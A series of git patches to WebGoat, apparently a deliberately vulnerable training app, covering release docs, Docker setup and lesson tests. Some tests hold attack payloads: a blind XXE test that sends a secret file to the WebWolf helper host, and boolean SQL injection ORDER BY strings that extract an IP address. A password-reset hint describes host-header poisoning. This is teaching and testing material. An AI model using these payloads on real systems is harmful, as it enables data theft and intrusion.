From 4d7d0058c3ba0b4e542ed7e964ee1056207b7a08 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Wed, 20 Jun 2018 18:38:16 +0200 Subject: [PATCH 01/28] Update how to create a release document --- CREATE_RELEASE.MD | 14 +++++--------- 1 file changed, 5 insertions(+), 9 deletions(-) diff --git a/CREATE_RELEASE.MD b/CREATE_RELEASE.MD index f9199020d..d7d566313 100644 --- a/CREATE_RELEASE.MD +++ b/CREATE_RELEASE.MD @@ -12,18 +12,14 @@ At the moment we use Gitflow, for a release you create a new release branch and ``` git checkout develop git flow release start -mvn versions:set < -git commit -am "New release, updaing pom.xml" +mvn versions:set < +git commit -am "New release, updating pom.xml" git flow release publish +git push --tags ``` -Now we can make a new release, be sure you committed all your changes. +Now Travis takes over and will create the release in Github and on Docker Hub. -``` -git tag v8.0.0.M15 -git push origin v8.0.0.M15 -``` - -Now Travis takes over and will create the release in Github and on Docker Hub. +NOTE: the `mvn versions:set` command above is just there to make sure the master branch contains the latest version From 651698d96cc5fd272459ffba32fcbea62f103475 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Thu, 21 Jun 2018 07:17:27 +0200 Subject: [PATCH 02/28] Add different solution for XXE attack --- .../plugin/BlindSendFileAssignmentTest.java | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) diff --git a/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java b/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java index 621fdd1b3..606b51318 100644 --- a/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java +++ b/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java @@ -89,7 +89,34 @@ public class BlindSendFileAssignmentTest extends LessonTest { "%remote;" + "]>" + "test&send;"; + performXXE(xml); + } + @Test + public void solveOnlyParamReferenceEntityInExternalDTD() throws Exception { + File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt"); + //Host DTD on WebWolf site + String dtd = "\n" + + "\">\n"; + webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd")) + .willReturn(aResponse() + .withStatus(200) + .withBody(dtd))); + webwolfServer.stubFor(get(urlMatching("/landing.*")).willReturn(aResponse().withStatus(200))); + + //Make the request from WebGoat + String xml = "" + + "\n" + + "" + + "%remote;" + + "%all;" + + "]>" + + "test&send;"; + performXXE(xml); + } + + private void performXXE(String xml) throws Exception { //Call with XXE injection mockMvc.perform(MockMvcRequestBuilders.post("/xxe/blind") .content(xml)) From cb18295f9faa10b75aa09d011ea2e7a6ee8549ce Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Thu, 21 Jun 2018 07:53:21 +0200 Subject: [PATCH 03/28] Update hint --- .../src/main/resources/i18n/WebGoatLabels.properties | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties index 709165e15..063e1d3b5 100644 --- a/webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties +++ b/webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties @@ -15,7 +15,7 @@ password-reset-not-solved=Sorry but you did not redirect the reset link to WebWo password-reset-hint1=Try to send a password reset link to your own account at {user}@webgoat.org, you can read this e-mail in WebWolf. password-reset-hint2=Look at the link, can you think how the server creates this link? password-reset-hint3=Tom clicks all the links he receives in his mailbox, you can use the landing page in WebWolf to get the reset link... -password-reset-hint4=The link points to localhost:8080/PasswordReset/.... can you change the host to localhost:9090 +password-reset-hint4=The link points to localhost:8080/PasswordReset/.... can you change the host to localhost:9090? password-reset-hint5=Intercept the request and change the host header login_failed=Login failed login_failed.tom=Sorry only Tom can login at the moment \ No newline at end of file From 2233550fe1692e364f50eac58ad31d854885a848 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Fri, 22 Jun 2018 14:12:37 +0200 Subject: [PATCH 04/28] Adding more solutions for SQL order by lesson --- .../mitigation/SqlInjectionLesson12aTest.java | 46 +++++++++++++++---- 1 file changed, 36 insertions(+), 10 deletions(-) diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/mitigation/SqlInjectionLesson12aTest.java b/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/mitigation/SqlInjectionLesson12aTest.java index 6e089f236..cee8e8c13 100644 --- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/mitigation/SqlInjectionLesson12aTest.java +++ b/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/plugin/mitigation/SqlInjectionLesson12aTest.java @@ -28,7 +28,7 @@ public class SqlInjectionLesson12aTest extends LessonTest { private WebgoatContext context; @Before - public void setup() throws Exception { + public void setup() { SqlInjection sql = new SqlInjection(); when(webSession.getCurrentLesson()).thenReturn(sql); @@ -44,6 +44,40 @@ public class SqlInjectionLesson12aTest extends LessonTest { .andExpect(status().isOk()); } + @Test + public void addressCorrectShouldOrderByHostname() throws Exception { + mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") + .param("column", "CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-prd') LIKE '104.%' THEN hostname ELSE id END")) + + .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc"))); + } + + @Test + public void addressCorrectShouldOrderByHostnameUsingSubstr() throws Exception { + mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") + .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,1,1) = '1') IS NOT NULL then hostname else id end")) + + .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc"))); + + mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") + .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,2,1) = '0') IS NOT NULL then hostname else id end")) + + .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc"))); + + mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") + .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,3,1) = '4') IS NOT NULL then hostname else id end")) + + .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc"))); + } + + @Test + public void addressIncorrectShouldOrderByIdUsingSubstr() throws Exception { + mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") + .param("column", "case when (select ip from servers where hostname='webgoat-prd' and substr(ip,1,1) = '9') IS NOT NULL then hostname else id end")) + + .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-dev"))); + } + @Test public void trueShouldSortByHostname() throws Exception { mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") @@ -63,21 +97,13 @@ public class SqlInjectionLesson12aTest extends LessonTest { } @Test - public void passwordIncorrectShouldOrderByHostname() throws Exception { + public void addressIncorrectShouldOrderByHostname() throws Exception { mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") .param("column", "CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-prd') LIKE '192.%' THEN hostname ELSE id END")) .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-dev"))); } - @Test - public void passwordCorrectShouldOrderByHostname() throws Exception { - mockMvc.perform(MockMvcRequestBuilders.get("/SqlInjection/servers") - .param("column", "CASE WHEN (SELECT ip FROM servers WHERE hostname='webgoat-prd') LIKE '104.%' THEN hostname ELSE id END")) - - .andExpect(status().isOk()).andExpect(jsonPath("$[0].hostname", is("webgoat-acc"))); - } - @Test public void postingCorrectAnswerShouldPassTheLesson() throws Exception { mockMvc.perform(MockMvcRequestBuilders.post("/SqlInjection/attack12a") From f9e552f1cd9f73cb360d3361eb70964c0f5979a5 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Wed, 4 Jul 2018 19:15:54 +0200 Subject: [PATCH 05/28] Add instructions how to run WebGoat on Java 9 or higher --- README.MD | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.MD b/README.MD index ccfee85bb..e47961d5e 100644 --- a/README.MD +++ b/README.MD @@ -40,6 +40,12 @@ java -jar webgoat-server-<>.jar [--server.port=8080] [--server.address= By default WebGoat starts on port 8080 with `--server.port` you can specify a different port. With `server.address` you can bind it to a different address (default localhost) +If you use Java 9 or higher you need to run WebGoat as follows: + +```Shell +java --add-modules java.xml.bind -jar webgoat-server-8.0.0.VERSION.jar +``` + ## 2. Run using Docker From time to time we publish a new development preview of WebGoat 8 on Docker HUB, you can download this version From 63a50df7a1518103eed302994ada534381adcb08 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Fri, 6 Jul 2018 18:22:29 +0200 Subject: [PATCH 06/28] Add hint to lesson users no longer have guess the complete ip address --- .gitignore | 5 +++-- .../main/resources/lessonPlans/en/SqlInjection_order_by.adoc | 3 ++- 2 files changed, 5 insertions(+), 3 deletions(-) diff --git a/.gitignore b/.gitignore index 85137d053..32b59f04e 100644 --- a/.gitignore +++ b/.gitignore @@ -44,5 +44,6 @@ webgoat-server/mongo-data/* webgoat-lessons/vulnerable-components/dependency-reduced-pom.xml **/.sts4-cache/* **/.vscode/* - -/.sonatype \ No newline at end of file +**/.factorypath +/.sonatype +**/bin/* \ No newline at end of file diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_order_by.adoc b/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_order_by.adoc index 6adb9156b..6e8ff54e0 100644 --- a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_order_by.adoc +++ b/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_order_by.adoc @@ -1,4 +1,5 @@ In this assignment try to perform an SQL injection through the ORDER BY field. -Try to find the ip address of the `webgoat-prd` server. +Try to find the ip address of the `webgoat-prd` server, guessing the complete +ip address might take too long so we give you the last part: `xxx.130.219.202` Note: The submit field of this assignment is *NOT* vulnerable for an SQL injection. \ No newline at end of file From 1252e3dc212fb25dabe1be48f69f1d7ce1ad7c9d Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Tue, 17 Jul 2018 20:17:35 +0200 Subject: [PATCH 07/28] Update instructions to use docker-compose only --- .gitignore | 6 ++- README.MD | 43 ++++++------------- docker-compose-local.yml | 18 ++++++++ docker-compose-postgres.yml | 5 +++ docker-compose.yml | 19 ++------ pom.xml | 2 +- scripts/start.sh | 18 ++++++++ webgoat-container/pom.xml | 2 +- webgoat-lessons/auth-bypass/pom.xml | 2 +- webgoat-lessons/bypass-restrictions/pom.xml | 2 +- webgoat-lessons/challenge/pom.xml | 2 +- webgoat-lessons/client-side-filtering/pom.xml | 2 +- webgoat-lessons/cross-site-scripting/pom.xml | 2 +- webgoat-lessons/csrf/pom.xml | 2 +- webgoat-lessons/html-tampering/pom.xml | 2 +- webgoat-lessons/http-basics/pom.xml | 2 +- webgoat-lessons/http-proxies/pom.xml | 2 +- webgoat-lessons/idor/pom.xml | 2 +- .../insecure-deserialization/pom.xml | 2 +- webgoat-lessons/insecure-login/pom.xml | 2 +- webgoat-lessons/jwt/pom.xml | 2 +- webgoat-lessons/missing-function-ac/pom.xml | 2 +- webgoat-lessons/password-reset/pom.xml | 2 +- webgoat-lessons/pom.xml | 4 +- webgoat-lessons/sql-injection/pom.xml | 2 +- webgoat-lessons/vulnerable-components/pom.xml | 2 +- webgoat-lessons/webgoat-introduction/pom.xml | 2 +- webgoat-lessons/webwolf-introduction/pom.xml | 2 +- .../lessonPlans/en/IntroductionWebWolf.adoc | 16 ++----- webgoat-lessons/xxe/pom.xml | 2 +- webgoat-server/Dockerfile | 1 - webgoat-server/pom.xml | 2 +- .../owasp/webgoat/HSQLDBDatabaseConfig.java | 4 +- .../java/org/owasp/webgoat/StartWebGoat.java | 5 +++ webwolf/Dockerfile | 2 - webwolf/pom.xml | 2 +- 36 files changed, 99 insertions(+), 90 deletions(-) create mode 100644 docker-compose-local.yml create mode 100644 scripts/start.sh diff --git a/.gitignore b/.gitignore index 32b59f04e..549b59a14 100644 --- a/.gitignore +++ b/.gitignore @@ -46,4 +46,8 @@ webgoat-lessons/vulnerable-components/dependency-reduced-pom.xml **/.vscode/* **/.factorypath /.sonatype -**/bin/* \ No newline at end of file +**/bin/* +webgoat.lck +webgoat.log +webgoat.properties +webgoat.script \ No newline at end of file diff --git a/README.MD b/README.MD index e47961d5e..3290fbee4 100644 --- a/README.MD +++ b/README.MD @@ -34,7 +34,7 @@ first thing that all hackers claim.* Download the latest WebGoat release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases) ```Shell -java -jar webgoat-server-<>.jar [--server.port=8080] [--server.address=localhost] +java -jar webgoat-server-8.0.0.VERSION.jar [--server.port=8080] [--server.address=localhost] ``` By default WebGoat starts on port 8080 with `--server.port` you can specify a different port. With `server.address` you @@ -48,40 +48,21 @@ java --add-modules java.xml.bind -jar webgoat-server-8.0.0.VERSION.jar ## 2. Run using Docker -From time to time we publish a new development preview of WebGoat 8 on Docker HUB, you can download this version -[https://hub.docker.com/r/webgoat/webgoat-8.0/](https://hub.docker.com/r/webgoat/webgoat-8.0/). -First install Docker, then open a command shell/window and type: +Every release is also published on [DockerHub]((https://hub.docker.com/r/webgoat/webgoat-8.0/)). -```Shell -docker pull webgoat/webgoat-8.0 -docker run -p 8080:8080 -it webgoat/webgoat-8.0 /home/webgoat/start.sh +### Using docker-compose + +The easiest way to start WebGoat as a Docker container is to use the `docker-compose.yml` [file](https://raw.githubusercontent.com/WebGoat/WebGoat/develop/docker-compose.yml) +from our Github repository. This will start both containers and it also takes care of setting up the +connection between WebGoat and WebWolf. + +```shell +curl https://raw.githubusercontent.com/WebGoat/WebGoat/develop/docker-compose.yml | docker-compose -f - up ``` -If you want to keep the database between Docker sessions you need to map the WebGoat data directory to a -folder on the host system as follows: - -```Shell -docker run -p 8080:8080 -it -v /tmp/webgoat-data:/home/webgoat/.webgoat-${VERSION} webgoat/webgoat-8.0 /home/webgoat/start.sh -``` - -where `${VERSION}` is for example `v8.0.0.M14`. The data will now be stored in `/tmp/webgoat-data` on your host system. - -Wait for the Docker container to start, and run `docker ps` to verify it's running. - -- If you are using `docker-machine`, verify the machine IP using `docker-machine env` -- If you are using `boot2docker` on OSX, verify the IP by running `docker network inspect bridge` -- Otherwise, the host will be bound to localhost - -Once you have the IP and port, you'll want to navigate to the `/WebGoat` path in the URL. For example: - -``` -http://192.168.99.100:8080/WebGoat -``` - -Here you'll be able to register a new user and get started. - -_Please note: this version may not be completely in sync with the develop branch._ +**Important**: the current directory on your host will be mapped into the container for keeping state. +Using the `docker-compose` file will simplify getting WebGoat and WebWolf up and running. ## 3. Run from the sources diff --git a/docker-compose-local.yml b/docker-compose-local.yml new file mode 100644 index 000000000..f65bea120 --- /dev/null +++ b/docker-compose-local.yml @@ -0,0 +1,18 @@ +version: '2.1' + +services: + webgoat: + image: webgoat/webgoat-v8.0.0.snapshot + environment: + - WEBWOLF_HOST=webwolf + - WEBWOLF_PORT=9090 + ports: + - "8080:8080" + volumes: + - .:/home/webgoat/.webgoat + command: "java -Djava.security.egd=file:/dev/./urandom -jar /home/webgoat/webgoat.jar --server.address=0.0.0.0 --server.port=8080" + webwolf: + image: webgoat/webwolf-v8.0.0.snapshot + ports: + - "9090:9090" + command: bash -c "sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar --server.port=9090 --server.address=0.0.0.0 --spring.datasource.url=jdbc:hsqldb:hsql://webgoat:9001/webgoat" diff --git a/docker-compose-postgres.yml b/docker-compose-postgres.yml index 919cbd509..56c9a707c 100644 --- a/docker-compose-postgres.yml +++ b/docker-compose-postgres.yml @@ -12,6 +12,8 @@ services: - spring.datasource.password=webgoat - spring.datasource.driver-class-name=org.postgresql.Driver - spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.PostgreSQL94Dialect + - webgoat.server.directory=/home/webgoat/.webgoat/ + - webgoat.user.directory=/home/webgoat/.webgoat/ ports: - "8080:8080" webwolf: @@ -27,6 +29,9 @@ services: db: container_name: webgoat_db image: postgres:latest +# Uncomment to store the state of the database on the host. +# volumes: +# - ./database:/var/lib/postgresql environment: - POSTGRES_PASSWORD=webgoat - POSTGRES_USER=webgoat diff --git a/docker-compose.yml b/docker-compose.yml index 725195504..a4e888edb 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -6,24 +6,13 @@ services: environment: - WEBWOLF_HOST=webwolf - WEBWOLF_PORT=9090 - - spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat ports: - "8080:8080" - depends_on: - - db + volumes: + - .:/home/webgoat/.webgoat + command: "java -Djava.security.egd=file:/dev/./urandom -jar /home/webgoat/webgoat.jar --server.address=0.0.0.0" webwolf: image: webgoat/webwolf - environment: - - spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat ports: - "9090:9090" - depends_on: - - db - db: - image: blacklabelops/hsqldb - container_name: webgoat_db - environment: - - HSQLDB_TRACE=false - - HSQLDB_SILENT=true - - HSQLDB_DATABASE_NAME=webgoat - - HSQLDB_DATABASE_ALIAS=webgoat + command: bash -c "sleep 8 && java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar --server.port=9090 --server.address=0.0.0.0 --spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat" diff --git a/pom.xml b/pom.xml index aa855b919..206ecb2ed 100644 --- a/pom.xml +++ b/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent pom - v8.0.0.M20 + v8.0.0.SNAPSHOT WebGoat Parent Pom Parent Pom for the WebGoat Project. A deliberately insecure Web Application diff --git a/scripts/start.sh b/scripts/start.sh new file mode 100644 index 000000000..3380882af --- /dev/null +++ b/scripts/start.sh @@ -0,0 +1,18 @@ +#!/usr/bin/env bash + +DATABASE_PORT=9001 + +checkDatabaseAvailable(){ + + #for i in $(seq 1 5); do command && s=0 && break || s=$? && sleep 15; done; (exit $s) + local started = $(netstat -lnt | grep ${DATABASE_PORT}) + echo $? +} + +#java -Djava.security.egd=file:/dev/./urandom -jar home/webgoat/webgoat.jar --server.address=0.0.0.0 +$(checkDatabaseAvailable) + + +#java -Djava.security.egd=file:/dev/./urandom -jar /home/webwolf/webwolf.jar --server.port=9090 --server.address=0.0.0.0 + + diff --git a/webgoat-container/pom.xml b/webgoat-container/pom.xml index 8821d469d..11edb880f 100644 --- a/webgoat-container/pom.xml +++ b/webgoat-container/pom.xml @@ -10,7 +10,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/auth-bypass/pom.xml b/webgoat-lessons/auth-bypass/pom.xml index 460175912..6e63139a2 100644 --- a/webgoat-lessons/auth-bypass/pom.xml +++ b/webgoat-lessons/auth-bypass/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/bypass-restrictions/pom.xml b/webgoat-lessons/bypass-restrictions/pom.xml index 0d81dd53a..29f56754c 100755 --- a/webgoat-lessons/bypass-restrictions/pom.xml +++ b/webgoat-lessons/bypass-restrictions/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/challenge/pom.xml b/webgoat-lessons/challenge/pom.xml index 58f7f9daa..b8f9144c9 100644 --- a/webgoat-lessons/challenge/pom.xml +++ b/webgoat-lessons/challenge/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/client-side-filtering/pom.xml b/webgoat-lessons/client-side-filtering/pom.xml index 7f37c3064..485e42b76 100644 --- a/webgoat-lessons/client-side-filtering/pom.xml +++ b/webgoat-lessons/client-side-filtering/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/cross-site-scripting/pom.xml b/webgoat-lessons/cross-site-scripting/pom.xml index a18aa3720..b8c1021ff 100644 --- a/webgoat-lessons/cross-site-scripting/pom.xml +++ b/webgoat-lessons/cross-site-scripting/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/csrf/pom.xml b/webgoat-lessons/csrf/pom.xml index 49658a14c..cc8d429c5 100644 --- a/webgoat-lessons/csrf/pom.xml +++ b/webgoat-lessons/csrf/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/html-tampering/pom.xml b/webgoat-lessons/html-tampering/pom.xml index 47cf3df7b..2c7fe60c0 100755 --- a/webgoat-lessons/html-tampering/pom.xml +++ b/webgoat-lessons/html-tampering/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/http-basics/pom.xml b/webgoat-lessons/http-basics/pom.xml index 9d112c91b..9fdf8d13b 100644 --- a/webgoat-lessons/http-basics/pom.xml +++ b/webgoat-lessons/http-basics/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/http-proxies/pom.xml b/webgoat-lessons/http-proxies/pom.xml index 72aafac2f..a78c58090 100644 --- a/webgoat-lessons/http-proxies/pom.xml +++ b/webgoat-lessons/http-proxies/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/idor/pom.xml b/webgoat-lessons/idor/pom.xml index a147a7f9d..6620f6920 100644 --- a/webgoat-lessons/idor/pom.xml +++ b/webgoat-lessons/idor/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/insecure-deserialization/pom.xml b/webgoat-lessons/insecure-deserialization/pom.xml index cf9f62c28..68a95c885 100755 --- a/webgoat-lessons/insecure-deserialization/pom.xml +++ b/webgoat-lessons/insecure-deserialization/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/insecure-login/pom.xml b/webgoat-lessons/insecure-login/pom.xml index 7e392e4d5..ed6bd358e 100755 --- a/webgoat-lessons/insecure-login/pom.xml +++ b/webgoat-lessons/insecure-login/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/jwt/pom.xml b/webgoat-lessons/jwt/pom.xml index ce32296b1..ec6861190 100644 --- a/webgoat-lessons/jwt/pom.xml +++ b/webgoat-lessons/jwt/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/missing-function-ac/pom.xml b/webgoat-lessons/missing-function-ac/pom.xml index 7ac4b0b5f..8b266b4c2 100644 --- a/webgoat-lessons/missing-function-ac/pom.xml +++ b/webgoat-lessons/missing-function-ac/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/password-reset/pom.xml b/webgoat-lessons/password-reset/pom.xml index ec760f813..5e78f3b0e 100644 --- a/webgoat-lessons/password-reset/pom.xml +++ b/webgoat-lessons/password-reset/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/pom.xml b/webgoat-lessons/pom.xml index e3e19e957..e5f66efdf 100644 --- a/webgoat-lessons/pom.xml +++ b/webgoat-lessons/pom.xml @@ -5,12 +5,12 @@ org.owasp.webgoat.lesson webgoat-lessons-parent pom - v8.0.0.M20 + v8.0.0.SNAPSHOT org.owasp.webgoat webgoat-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/sql-injection/pom.xml b/webgoat-lessons/sql-injection/pom.xml index 32bc48b23..46677291d 100644 --- a/webgoat-lessons/sql-injection/pom.xml +++ b/webgoat-lessons/sql-injection/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/vulnerable-components/pom.xml b/webgoat-lessons/vulnerable-components/pom.xml index b38a8e124..df1c57c62 100644 --- a/webgoat-lessons/vulnerable-components/pom.xml +++ b/webgoat-lessons/vulnerable-components/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-lessons/webgoat-introduction/pom.xml b/webgoat-lessons/webgoat-introduction/pom.xml index 864d625a2..d4e2db171 100644 --- a/webgoat-lessons/webgoat-introduction/pom.xml +++ b/webgoat-lessons/webgoat-introduction/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/webwolf-introduction/pom.xml b/webgoat-lessons/webwolf-introduction/pom.xml index ef1890980..22745b96a 100644 --- a/webgoat-lessons/webwolf-introduction/pom.xml +++ b/webgoat-lessons/webwolf-introduction/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc b/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc index bf15f54c3..77f3f3452 100644 --- a/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc +++ b/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc @@ -23,8 +23,8 @@ website. The following items are supported in WebWolf: * Receiving email * Landing page for incoming requests -WebWolf runs as a separate web application and is started automatically when using the Docker image. If you -are not using the Docker image you will need to download the jar file and start it: +WebWolf runs as a separate web application. If you are using the Docker-compose file you can just point your browser webWolfLink:here[] to open WebWolf. +If you want to use the standalone version, you will need to download the jar file and start it: ``` java -jar webwolf-<>.jar [--server.port=9090] [--server.address=localhost] @@ -33,17 +33,7 @@ java -jar webwolf-<>.jar [--server.port=9090] [--server.address=localho By default WebWolf starts on port 9090 with `--server.port` you can specify a different port. With `server.address` you can bind it to a different address (default localhost) -WebWolf is also available as a Docker container, because it shares the database with WebGoat we first need -to find out the ip address of the Docker container. - -``` -WEBGOAT_SERVER_ADDRESS=$(docker inspect -f "{{ .NetworkSettings.IPAddress }}" `docker ps | grep webgoat | awk '{print $1}'`) -docker pull webgoat/webwolf -docker run -e webgoat.server.address=${WEBGOAT_SERVER_ADDRESS} -it -p 9090:9090 webgoat/webwolf /home/webwolf/run.sh -``` - -Note: if you start WebGoat as standalone application you need to start WebWolf as standalone application as well. If -you start WebGoat as Docker container you need to start WebWolf as Docker container as well. +Note: if you start WebGoat as standalone application you need to start WebWolf as standalone application as well. This will start the application on port 9090, click webWolfLink:here[] to open WebWolf. diff --git a/webgoat-lessons/xxe/pom.xml b/webgoat-lessons/xxe/pom.xml index 4351432b6..781f2cc36 100644 --- a/webgoat-lessons/xxe/pom.xml +++ b/webgoat-lessons/xxe/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-server/Dockerfile b/webgoat-server/Dockerfile index 85562dba0..c5b43c961 100644 --- a/webgoat-server/Dockerfile +++ b/webgoat-server/Dockerfile @@ -10,5 +10,4 @@ USER webgoat RUN cd /home/webgoat/; mkdir -p .webgoat-${webgoat_version} COPY target/webgoat-server-${webgoat_version}.jar /home/webgoat/webgoat.jar -ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webgoat/webgoat.jar", "--server.address=0.0.0.0"] EXPOSE 8080 \ No newline at end of file diff --git a/webgoat-server/pom.xml b/webgoat-server/pom.xml index 2f4447c55..af9f6c6c1 100644 --- a/webgoat-server/pom.xml +++ b/webgoat-server/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0.M20 + v8.0.0.SNAPSHOT diff --git a/webgoat-server/src/main/java/org/owasp/webgoat/HSQLDBDatabaseConfig.java b/webgoat-server/src/main/java/org/owasp/webgoat/HSQLDBDatabaseConfig.java index fe42f1c97..adcac776b 100644 --- a/webgoat-server/src/main/java/org/owasp/webgoat/HSQLDBDatabaseConfig.java +++ b/webgoat-server/src/main/java/org/owasp/webgoat/HSQLDBDatabaseConfig.java @@ -1,5 +1,6 @@ package 